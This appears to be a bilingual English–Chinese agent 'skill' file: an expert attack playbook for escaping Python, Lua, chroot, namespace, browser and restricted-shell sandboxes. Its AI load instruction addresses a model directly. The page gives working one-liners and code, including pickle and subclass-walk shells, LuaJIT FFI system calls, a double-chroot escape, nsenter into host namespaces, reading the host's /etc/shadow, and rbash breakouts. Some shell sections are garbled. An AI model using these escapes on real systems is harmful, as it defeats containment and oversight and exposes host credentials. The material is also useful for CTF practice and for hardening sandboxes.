sandbox-escape-techniques

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Sandbox Escape — Expert Attack Playbook

SKILL: Sandbox Escape — 专家攻击手册

AI LOAD INSTRUCTION: Expert sandbox escape techniques across Python, Lua, seccomp, chroot, Docker/container, and browser sandbox contexts. Covers CTF pyjail patterns, seccomp architecture confusion, chroot fd leaks, namespace escape, and Mojo IPC abuse. Distilled from ctf-wiki sandbox sections and real-world container escapes. Base models often miss the distinction between sandbox types and apply wrong escape techniques.

AI加载说明：覆盖Python、Lua、seccomp、chroot、Docker/容器、浏览器沙箱场景的专家级沙箱逃逸技术，包含CTF pyjail模式、seccomp架构混淆、chroot文件描述符泄漏、命名空间逃逸以及Mojo IPC滥用。内容提炼自ctf-wiki沙箱板块和真实场景容器逃逸案例，基础大模型通常无法区分不同沙箱类型，会误用逃逸技术。

0. RELATED ROUTING

0. 相关跳转链接

browser-exploitation-v8 — V8 exploitation for renderer RCE before browser sandbox escape
container-escape-techniques — Docker/container specific escape techniques
kernel-exploitation — kernel exploit for container/namespace escape
linux-privilege-escalation — post-escape privilege escalation

browser-exploitation-v8 — 浏览器沙箱逃逸前用于获取渲染器RCE的V8漏洞利用技术
container-escape-techniques — Docker/容器专属逃逸技术
kernel-exploitation — 用于容器/命名空间逃逸的内核漏洞利用技术
linux-privilege-escalation — 逃逸后的权限提升技术

Advanced References

高级参考资料

PYTHON_SANDBOX_ESCAPE.md — Full pyjail methodology:
```
__builtins__
```
recovery, keyword bypass, AST bypass, pickle escape
SECCOMP_BYPASS.md — Architecture confusion, io_uring bypass, ptrace bypass, allowed syscall chaining

PYTHON_SANDBOX_ESCAPE.md — 完整pyjail方法体系：
```
__builtins__
```
恢复、关键词绕过、AST绕过、pickle逃逸
SECCOMP_BYPASS.md — 架构混淆、io_uring绕过、ptrace绕过、允许的系统调用链构造

1. SANDBOX TYPE IDENTIFICATION

1. 沙箱类型识别

Sandbox Type	Indicators	Typical Context
Python sandbox (pyjail)	Limited builtins, filtered keywords, `exec` / `eval` available	CTF, online judges, Jupyter
Lua sandbox	No `os` , `io` modules; restricted metatables	Game scripting, config
seccomp	syscall filtering, `prctl(PR_SET_SECCOMP)`	CTF pwn, container hardening
chroot	Changed root filesystem, limited `/proc` access	Legacy isolation
Docker/container	Namespaces, cgroups, reduced capabilities	Cloud, microservices
Browser (renderer)	OS-level sandbox (seccomp-bpf + namespaces on Linux)	Chrome, Firefox
Namespace isolation	PID/mount/network/user namespace	Container runtimes

沙箱类型	识别特征	典型场景
Python沙箱（pyjail）	内置函数受限、关键词过滤、 `exec` / `eval` 可用	CTF、在线判题系统、Jupyter
Lua沙箱	无 `os` 、 `io` 模块；元表被限制	游戏脚本、配置系统
seccomp	系统调用过滤、存在 `prctl(PR_SET_SECCOMP)` 调用	CTF pwn题、容器加固
chroot	根文件系统被修改、 `/proc` 访问受限	传统隔离方案
Docker/容器	命名空间、cgroups、能力集裁剪	云环境、微服务
浏览器（渲染器）	操作系统级沙箱（Linux上为seccomp-bpf + 命名空间）	Chrome、Firefox
命名空间隔离	PID/挂载/网络/用户命名空间	容器运行时

2. PYTHON SANDBOX ESCAPE (OVERVIEW)

2. Python沙箱逃逸（概览）

See PYTHON_SANDBOX_ESCAPE.md for full methodology.

完整方法体系参考PYTHON_SANDBOX_ESCAPE.md。

Quick Reference

快速参考

Technique	One-Liner
Subclass walk	`().__class__.__bases__[0].__subclasses__()` → find `os._wrap_close` → `__init__.__globals__['system']`
Import recovery	`__builtins__.__import__('os').system('sh')`
getattr bypass	`getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os')`
chr construction	`eval(chr(95)+chr(95)+'import'+chr(95)+chr(95))`
Pickle escape	`pickle.loads(b"cos\nsystem\n(S'sh'\ntR.")`
Code object	Construct `types.CodeType(...)` then `exec()` with custom bytecode

技术	单行代码实现
子类遍历	`().__class__.__bases__[0].__subclasses__()` → 找到 `os._wrap_close` → 调用 `__init__.__globals__['system']`
导入恢复	`__builtins__.__import__('os').system('sh')`
getattr绕过	`getattr(getattr(__builtins__, '__imp'+'ort__'), '__call__')('os')`
chr拼接构造	`eval(chr(95)+chr(95)+'import'+chr(95)+chr(95))`
Pickle逃逸	`pickle.loads(b"cos\nsystem\n(S'sh'\ntR.")`
代码对象构造	构造 `types.CodeType(...)` 后传入 `exec()` 执行自定义字节码

3. LUA SANDBOX ESCAPE

3. LUA沙箱逃逸

Restricted Environment Bypass

受限环境绕过

lua

-- If debug library available:
debug.getinfo(1)                    -- information leakage
debug.getregistry()                 -- access global registry
debug.getupvalue(func, 1)           -- read closed-over variables
debug.setupvalue(func, 1, new_val)  -- overwrite upvalues

-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io

-- If loadstring available:
loadstring("os.execute('sh')")()

-- If string.dump available:
-- Dump function bytecode, patch it, load modified function

-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals

lua

-- If debug library available:
debug.getinfo(1)                    -- information leakage
debug.getregistry()                 -- access global registry
debug.getupvalue(func, 1)           -- read closed-over variables
debug.setupvalue(func, 1, new_val)  -- overwrite upvalues

-- Recover os module via debug:
local getupvalue = debug.getupvalue
-- Walk upvalues of known functions to find references to os/io

-- If loadstring available:
loadstring("os.execute('sh')")()

-- If string.dump available:
-- Dump function bytecode, patch it, load modified function

-- Metatables escape:
-- If rawset/rawget blocked but __index/__newindex exists:
-- Forge metatable chain to access restricted globals

Lua FFI Escape (LuaJIT)

Lua FFI逃逸（LuaJIT）

lua

-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")

-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry

lua

-- LuaJIT FFI provides C function access
local ffi = require("ffi")
ffi.cdef[[ int system(const char *command); ]]
ffi.C.system("sh")

-- If require is blocked but ffi is preloaded:
-- Find ffi via package.loaded or debug.getregistry

4. CHROOT ESCAPE

4. CHROOT逃逸

Technique	Condition	Method
Open fd to real root	File descriptor leaked from outside chroot	`fchdir(leaked_fd)` then `chroot(".")`
Double chroot	Process is root inside chroot	`mkdir("x"); chroot("x"); chdir("../../../..")`
TIOCSTI ioctl	Terminal access (fd 0 is a TTY)	Inject keystrokes to parent shell via `ioctl(0, TIOCSTI, &c)`
/proc access	`/proc` mounted inside chroot	`/proc/1/root/` → access real root filesystem
ptrace	CAP_SYS_PTRACE	Attach to process outside chroot
Mount namespace	Privileged	Mount real root into chroot

技术	前置条件	实现方法
真实根目录文件描述符泄漏	外部泄漏的文件描述符可在chroot内访问	调用 `fchdir(leaked_fd)` 后执行 `chroot(".")`
双重chroot	进程在chroot内拥有root权限	`mkdir("x"); chroot("x"); chdir("../../../..")`
TIOCSTI ioctl	拥有终端访问权限（文件描述符0为TTY）	通过 `ioctl(0, TIOCSTI, &c)` 向父shell注入按键
/proc可访问	chroot内挂载了 `/proc`	访问 `/proc/1/root/` 获取真实根文件系统权限
ptrace	拥有CAP_SYS_PTRACE权限	附加到chroot外的进程
挂载命名空间	拥有特权	将真实根目录挂载到chroot内

Double Chroot Escape

双重chroot逃逸

// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape");          // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot(".");                     // now at real root
execl("/bin/sh", "sh", NULL);

// Must be root inside chroot
mkdir("/tmp/escape", 0755);
chroot("/tmp/escape");          // new chroot inside old chroot
// Old CWD is now outside the new chroot
// Navigate up to real root:
for (int i = 0; i < 100; i++) chdir("..");
chroot(".");                     // now at real root
execl("/bin/sh", "sh", NULL);

5. BROWSER SANDBOX ESCAPE (OVERVIEW)

5. 浏览器沙箱逃逸（概览）

Chrome Sandbox Architecture (Linux)

Chrome沙箱架构（Linux）

Renderer Process:
  ├── seccomp-bpf (syscall filter)
  ├── PID namespace (isolated PIDs)
  ├── Network namespace (no direct network)
  ├── Mount namespace (minimal filesystem)
  └── Reduced capabilities (no CAP_SYS_ADMIN etc.)

Renderer Process:
  ├── seccomp-bpf (syscall filter)
  ├── PID namespace (isolated PIDs)
  ├── Network namespace (no direct network)
  ├── Mount namespace (minimal filesystem)
  └── Reduced capabilities (no CAP_SYS_ADMIN etc.)

Escape Vectors

逃逸向量

Vector	Description
Mojo IPC bug	UAF or type confusion in Mojo interface handler in browser process
Shared memory corruption	Corrupt shared memory segments between renderer and browser
GPU process bug	Exploit GPU process (less sandboxed) as stepping stone
Kernel exploit	Escape directly via kernel vulnerability (bypasses all sandboxing)
Signal handling	Race condition in signal delivery across sandbox boundary

向量	描述
Mojo IPC漏洞	浏览器进程中Mojo接口处理逻辑存在UAF或类型混淆
共享内存损坏	破坏渲染器和浏览器之间的共享内存段
GPU进程漏洞	利用沙箱限制更少的GPU进程作为跳板
内核漏洞	直接通过内核漏洞逃逸（绕过所有沙箱限制）
信号处理	沙箱边界信号传递过程中存在竞态条件

Mojo Interface Attack Pattern

Mojo接口攻击模式

1. Renderer RCE achieved (via V8/Blink bug)
2. Enumerate available Mojo interfaces from renderer
3. Find vulnerable interface (UAF on message handling, integer overflow in parameter validation)
4. Craft malicious Mojo message → trigger bug in browser process
5. Browser process is unsandboxed → full system access

1. 已获取渲染器RCE（通过V8/Blink漏洞）
2. 从渲染器枚举可用的Mojo接口
3. 找到存在漏洞的接口（消息处理存在UAF、参数校验存在整数溢出）
4. 构造恶意Mojo消息 → 触发浏览器进程漏洞
5. 浏览器进程无沙箱限制 → 获取完整系统权限

6. NAMESPACE ESCAPE

6. 命名空间逃逸

User Namespace Escalation

用户命名空间提权

bash

undefined

bash

undefined

If allowed to create user namespaces (unprivileged):

unshare -Urm # Create new user + mount namespace as root inside

Inside namespace: can mount, modify, etc.

Escape requires kernel bug or misconfiguration

undefined

undefined

PID Namespace Escape

PID命名空间逃逸

bash

undefined

bash

undefined

If /proc is from host (misconfigured container):

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Enters init process namespaces → host access

undefined

undefined

Mount Namespace Tricks

挂载命名空间技巧

bash

undefined

bash

undefined

If can see host filesystem via /proc/1/root:

ls -la /proc/1/root/ # host root filesystem cat /proc/1/root/etc/shadow # read host files

If can mount:

mount -t proc proc /proc

Access host /proc entries

---

---

7. RBASH / RESTRICTED SHELL ESCAPE

7. RBASH / 受限SHELL逃逸

Technique	Method
vi/vim	`:!/bin/bash` or `:set shell=/bin/bash` then `:shell`
less/more	`!/bin/bash`
awk	`awk 'BEGIN {system("/bin/bash")}'`
find	`find / -exec /bin/bash \;`
python/perl/ruby	`python -c 'import pty;pty.spawn("/bin/bash")'`
ssh	`ssh user@host -t /bin/bash`
Environment	`export PATH=/usr/bin:/bin; /bin/bash`
cp	Copy `/bin/bash` to allowed directory
git	`git help config` → then `!/bin/bash` in pager
Encoding	`echo /bin/bash

技术	实现方法
vi/vim	执行 `:!/bin/bash` 或 `:set shell=/bin/bash` 后执行 `:shell`
less/more	执行 `!/bin/bash`
awk	执行 `awk 'BEGIN {system("/bin/bash")}'`
find	执行 `find / -exec /bin/bash \;`
python/perl/ruby	执行 `python -c 'import pty;pty.spawn("/bin/bash")'`
ssh	执行 `ssh user@host -t /bin/bash`
环境变量	执行 `export PATH=/usr/bin:/bin; /bin/bash`
cp	将 `/bin/bash` 复制到允许访问的目录
git	执行 `git help config` → 在分页器中执行 `!/bin/bash`
编码绕过	执行`echo /bin/bash

8. DECISION TREE

8. 决策树

What type of sandbox?
├── Python sandbox (pyjail)?
│   └── See PYTHON_SANDBOX_ESCAPE.md
│       ├── __builtins__ available? → direct import
│       ├── Subclass walk: ().__class__.__bases__[0].__subclasses__()
│       ├── Keywords filtered? → chr()/getattr() construction
│       └── eval/exec available? → code object manipulation
│
├── Lua sandbox?
│   ├── debug library available? → getregistry/getupvalue
│   ├── FFI available (LuaJIT)? → ffi.C.system()
│   ├── loadstring available? → load arbitrary code
│   └── All restricted? → metatable chain exploitation
│
├── seccomp filter?
│   └── See SECCOMP_BYPASS.md
│       ├── Architecture confusion (32-bit syscalls from 64-bit)
│       ├── Allowed syscalls → ORW chain
│       ├── io_uring allowed? → bypass via io_uring
│       └── ptrace allowed? → debug child process
│
├── chroot jail?
│   ├── Root inside chroot? → double chroot escape
│   ├── Leaked fd? → fchdir to real root
│   ├── /proc mounted? → /proc/1/root access
│   └── Terminal access? → TIOCSTI injection
│
├── Container / Docker?
│   ├── Privileged container? → mount host, load kernel module
│   ├── Mounted docker.sock? → docker API → escape
│   ├── See ../container-escape-techniques/SKILL.md
│   └── Kernel exploit → full escape
│
├── Browser sandbox?
│   ├── Have renderer RCE? → target Mojo IPC for browser escape
│   ├── GPU process accessible? → less-sandboxed stepping stone
│   └── Kernel exploit → bypass sandbox entirely
│
└── Restricted shell (rbash)?
    └── Find any interactive program (vi, less, python, awk, git)

当前沙箱类型是什么？
├── Python沙箱（pyjail）？
│   └── 参考PYTHON_SANDBOX_ESCAPE.md
│       ├── __builtins__可用？ → 直接导入
│       ├── 子类遍历: ().__class__.__bases__[0].__subclasses__()
│       ├── 关键词被过滤？ → chr()/getattr()拼接构造
│       └── eval/exec可用？ → 代码对象操作
│
├── Lua沙箱？
│   ├── debug库可用？ → getregistry/getupvalue
│   ├── FFI可用（LuaJIT）？ → ffi.C.system()
│   ├── loadstring可用？ → 加载任意代码
│   └── 所有功能都受限？ → 元表链利用
│
├── seccomp过滤器？
│   └── 参考SECCOMP_BYPASS.md
│       ├── 架构混淆（64位环境调用32位系统调用）
│       ├── 允许的系统调用 → ORW链构造
│       ├── io_uring可用？ → 通过io_uring绕过
│       └── ptrace可用？ → 调试子进程
│
├── chroot监狱？
│   ├── chroot内拥有root权限？ → 双重chroot逃逸
│   ├── 存在泄漏的文件描述符？ → fchdir到真实根目录
│   ├── /proc已挂载？ → 访问/proc/1/root
│   └── 拥有终端访问权限？ → TIOCSTI注入
│
├── 容器 / Docker？
│   ├── 特权容器？ → 挂载主机目录、加载内核模块
│   ├── 挂载了docker.sock？ → 调用docker API实现逃逸
│   ├── 参考../container-escape-techniques/SKILL.md
│   └── 内核漏洞 → 完全逃逸
│
├── 浏览器沙箱？
│   ├── 已获取渲染器RCE？ → 针对Mojo IPC实现浏览器逃逸
│   ├── 可访问GPU进程？ → 利用沙箱限制更少的跳板
│   └── 内核漏洞 → 完全绕过沙箱
│
└── 受限shell（rbash）？
    └── 寻找任意交互式程序（vi, less, python, awk, git）